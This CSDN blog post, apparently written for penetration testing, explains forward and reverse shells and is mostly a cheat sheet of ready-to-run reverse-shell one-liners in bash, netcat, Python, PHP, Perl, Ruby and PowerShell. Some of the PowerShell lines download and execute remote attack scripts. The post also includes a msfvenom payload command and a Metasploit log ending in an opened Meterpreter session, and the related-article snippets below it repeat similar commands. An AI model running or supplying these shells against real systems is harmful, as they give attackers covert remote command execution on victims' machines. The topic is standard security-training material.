shell的正向和反向

最新推荐文章于 2023-04-10 09:47:39 发布
最新推荐文章于 2023-04-10 09:47:39 发布
阅读量8.5k 收藏 35
点赞数 6
分类专栏: 安全 文章标签: 安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46258964/article/details/122789897
版权

正向shell和反向shell
正向shell:控制端主动发起连接去连接被控制端
反向shell:被控制端主动连接控制端
在实战中,大多数采用反向shell,因为正向shell有很多因素导致连接失败,
比如说硬件设备有防火墙,入侵防御系统等,还有网站防火墙,端口占用,权限不足等场景,特别是硬件设备如果你正向连接被防火墙拦截导致打草惊蛇,后期攻击相当繁琐。
反向shell:而被控制端主动向外发送的数据包通常都不会被拦截。

反向shell如下

Linux常见反向shell
bash反弹shell

nc -lvp 4444
bash -i>& /dev/tcp/192.168.11.12/4444 0>&1

nc反弹shell

nc -lvp 4444   

nc 192.168.11.12 666 
/bin/bash |nc 192.168.11.12 666
nc 192.168.11.12 999 -e /bin/bash  Linux

python反弹shell

nc -lvp 9999 
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.12",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP反弹shell

nc -lvp 6666
php -r '$sock=fsockopen("192.168.11.12",6666);exec("/bin/sh -i <&3 >&3 2>&3");'

Perl反弹shell

perl -e 'use Socket; $i="192.168.11.12";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

ruby反弹shell

nc -lvp 4444
ruby -rsocket -e'f=TCPSocket.open("192.168.11.12",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Windows反弹shell如下

powercat反弹shell
powercat(https://github.com/besimorhino/powercat )为Powershell版的Netcat,

nc -vlp 6666 
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.11.12 -p 6666 -e cmd

nishang反弹shell
Nishang(https://github.com/samratashok/nishang )是一个基于PowerShell的攻击框架,
集合了一些PowerShell攻击脚本和有效载荷,可反弹TCP/ UDP/ HTTP/HTTPS/ ICMP等类型shell。

nc -lvp 6666
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.11.12 -port 6666

自定义powershell函数反弹shell

nc -lvp 6666
powershell -nop -c "$client = New-Object Net.Sockets.TCPClient('192.168.11.12',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

正向shell如下
nc 正向shell

nc -lvp 8080 -e /bin/bash   
nc 192.168.11.11 8080

msf木马正向shell

msfvenom -p windows/meterpreter/bind_tcp -f exe LPORT=80 -o shell.exe

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set lport  80
lport => 80
msf6 exploit(multi/handler) > set rhost 192.168.1.108
rhost => 192.168.1.108
msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 192.168.1.108:80
[*] Sending stage (175174 bytes) to 192.168.1.108
[*] Meterpreter session 1 opened (192.168.11.12:33071 -> 192.168.1.108:80 ) at 2022-02-01 20:28:13 +0800

meterpreter > 



msf,payload模块
set payload windows/meterpreter/bind_tcp			正向
set payload windows/x64/meterpreter/reverse_tcp  	反向
西湖第一剑
关注
  • 6
    点赞
  • 35
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
正向shell和反弹shell
weixin_45936149的博客
03-26 9618
正向shell反弹shell的利用场景以及使用技巧
提防远程攻击:了解正向 Shell反向 Shell 确保服务器安全
最新发布
.
06-28 925
在当今网络安全形势日益复杂的环境中,了解正向 Shell反向 Shell 的工作原理和使用场景,对于保护你的服务器免受远程攻击至关重要。本文不仅深入解析这两种常见的远程控制技术,还将提供有效的防护建议,帮助你提升服务器的安全防护水平,确保你的系统免遭入侵。在计算机网络和信息安全领域,正向 Shell反向 Shell 是两种常见的远程控制技术。它们在渗透测试、漏洞利用以及系统管理等方面有着广泛应用。正向 Shell (Forward Shell) 是指攻击者直接连接到目标机器的 Shell
反弹shell正向shell区别
ningyanggege的博客
08-25 2241
正向shell: 攻击机A,受害者B 正向shell:正常大家都能理解 A主动连接B,直接使用ssh命令;受害者的命令行的输入输出转到控制端 反弹shell: 反弹shell就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,将受害者的命令行的输入输出转到控制端 结论: 无论是正向shell还是反弹shell,都是A控制B,只是请求端不一样,一个是主动控制,一个被动控制,与正向代理和反向代理一样 反弹shell就会更加的稳定,用途更大 ...
【Try to Hack】正向shell反向shell
开心星人的博客
06-26 961
正向shell:控制端主动发起连接去连接被控制端 反向shell:被控制端主动连接控制端(大多数情况为连接vps,因为攻击者电脑通常没有公网IP所以不能进行连接)大多采用反向shell。在渗透环境中,通常由于被控端因防火墙受限、权限不足、端口被占用等情形。会导致通常进入被控制端的数据包会被拦截等原因的无法连接。而被控制端主动向外发送的数据包通常都不会被拦截。反向shell就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端什么时候进行反向shell? 1.某客户机中
反向 shell
lyyslsw的专栏
12-27 640
nc -p 4444 -lvv 监听在4444端口, 监听模式, 显示命令执行过程, 假设本机IP地址10.100.125.15 bash -i >& /dev/tcp/10.100.125.15/44440>&1, 假设本机IP地址为10.100.125.14 bash -i : bash的交互模式 当>&后面接文件时,表示将标准输...
反向shell
钱国正的专栏
10-21 650
参考链接客户端执行0<&196;exec 196<>/dev/tcp/<你的IP>/<相同的端口>; sh <&196 >&196 2>&196服务器端执行nc -l -p <任何未封锁的端口> -vvv
正向连接与反向连接1
08-08
渗透测试领域,正向连接和反向连接都是非常重要的技术。它们可以帮助安全研究人员更好地理解网络的安全状况,并采取相应的措施来保护网络免受攻击。通过上述步骤,我们可以清晰地了解如何使用Powercat结合nc来实现...
reverse-shell-generator:基于Web的反向shell生成器
02-05
在网络安全中,一个正向shell是受害者连接到攻击者的服务器,而反向shell则是攻击者连接到受害者的机器。这种连接方式使得攻击者可以隐藏其IP地址,更难被追踪。反向shell常用于渗透测试,以模拟黑客攻击并评估系统...
tunnelme:反向 SSH 和 SSH 隧道
06-13
标题 "tunnelme:反向 SSH 和 SSH 隧道" 涉及到的是一个与网络连接和安全相关的工具或技术,特别是如何利用 SSH(Secure Shell)来创建隧道进行远程访问。SSH 是一种用于安全地远程登录到服务器、执行命令和传输数据...
shell脚本项目详细笔记文档
07-09
本资源摘要信息主要讲解了使用shell脚本来实现DNS服务配置的方法,包括正向解析和反向解析的配置过程。通过两个示例脚本,我们可以了解到如何使用shell脚本来配置DNS服务,并实现域名解析和IP地址解析。 DNS服务...
Reverse_shell_python:反向Shell通过远程计算机将其Shell发送给攻击者来工作
05-12
然而,反向Shell则是受害者机器主动连接到攻击者的IP地址和端口,提供一个命令执行的通道。这种机制可以绕过防火墙规则,因为通常防火墙只阻止外向连接,而不是内向的请求。 在Python中实现反向Shell,通常涉及到...
正反代理与正反shell
weixin_45585955的博客
04-10 441
反向代理是从目标机器主动连接攻击者电脑,例如通过在目标机器执行操作访问者电脑建立的Shell正向代理是从攻击者电脑主动访问目标机器,例如主动访问目标建立shell正向shell反向shell是指攻击者出于外网,被攻击者出于内网,且是被攻击者主动连接攻击者;内外网的区别正向shell是攻击者出于内网,被攻击者出于公网;正向shell:控制端主动发起连接去连接被控制端。正向代理是服务器开放端口,客户端主动访问服务器的端口。反向shell:被控制端主动连接控制端。一、正向代理与反向代理。
基于DNS的反向Shell
手牵手科技
04-19 498
Chashell是一个由Go编写的基于DNS进行通信的反向shell。它可用于绕过防火墙或严格限制的网络。 它带有一个名为chaserv的多客户端控制服务器。 chashell 通信安全 每个数据包都使用对称加密(XSalsa20 + Poly1305)进行加密,客户端和服务器之间使用共享密钥。 我们计划在未来实现非对称加密。 协议 Chashell使用Protocol Buffers序列化消息进...
反向连接获得SHELL
kakaxia6337的专栏
08-22 715
#include #include #pragma comment(lib,"ws2_32.lib") SOCKET locals; STARTUPINFO si; PROCESS_INFORMATION pi; struct sockaddr_in s_sin; void help(char *cmd) { printf("CmdShell v1.0 ---- Made by Zwell/n"); printf("/tUsage:%s [host] port
windows下的正向shell
xiaoxiao的博客
03-20 1177
学习渗透怎么能不会shell呢,今天和明天的学习内容就是正向shell和反弹shell啦~~ shell:在计算机科学中,Shell俗称壳(用来区别于核),是指“为使用者提供操作界面”的软件(命令解析器)。它类似于DOS下的command.com和后来的cmd.exe。它接收用户命令,然后调用相应的应用程序。(ps:这个是百度百科的解释啦~~~) 当客户端攻击服务器端时,此时服务器端IP地址已知,...
使用netcat的正向 / 反向shell
weixin_33720078的博客
01-08 1182
reverse shell bind shell reverse shell描述图: 在此示例中,目标使用端口4444反向连接攻击主机。-e选项将Bash shell发回攻击主机。请注意,我们也可以在Windows的cmd.exe上使用-e选项。假设我们已经在目标主机上找到了远程代码执行(RCE)漏洞。我们可以在目标主机上使用-e发出Netcat命令,并使用...
反向Shell
钱国正的专栏
12-24 2728
http://os.51cto.com/art/201312/424378.htm 反向shell(Reverse shell)是一种往远程机器发送shell命令的技术,当远程机器处在防火墙等其它东西后面时,这种技术会变得非常有用。你也许会说,“一个普通的shell或简单的SSH通道不是也能实现这些吗?”不,无法实现。在网上,我看到很多人对普通shell反向shell之间的区别分不清。在我
正向shell反向shell
08-19
正向shell反向shell是两种不同的网络连接方式。正向shell是控制端主动发起连接去连接被控制端,而反向shell是被控制端主动连接控制端。在实际应用中,大多数情况下采用反向shell,因为正向shell有很多因素导致连接失败,如硬件设备有防火墙、入侵防御系统等。此外,网站防火墙、端口占用和权限不足等情况也可能导致正向shell连接的失败。相比之下,反向shell通过被控制端主动向外发送数据包的方式进行连接,通常不会被拦截。因此,反向shell在后期的攻击过程中更加便利和灵活。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [shell正向反向](https://blog.csdn.net/qq_46258964/article/details/122789897)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值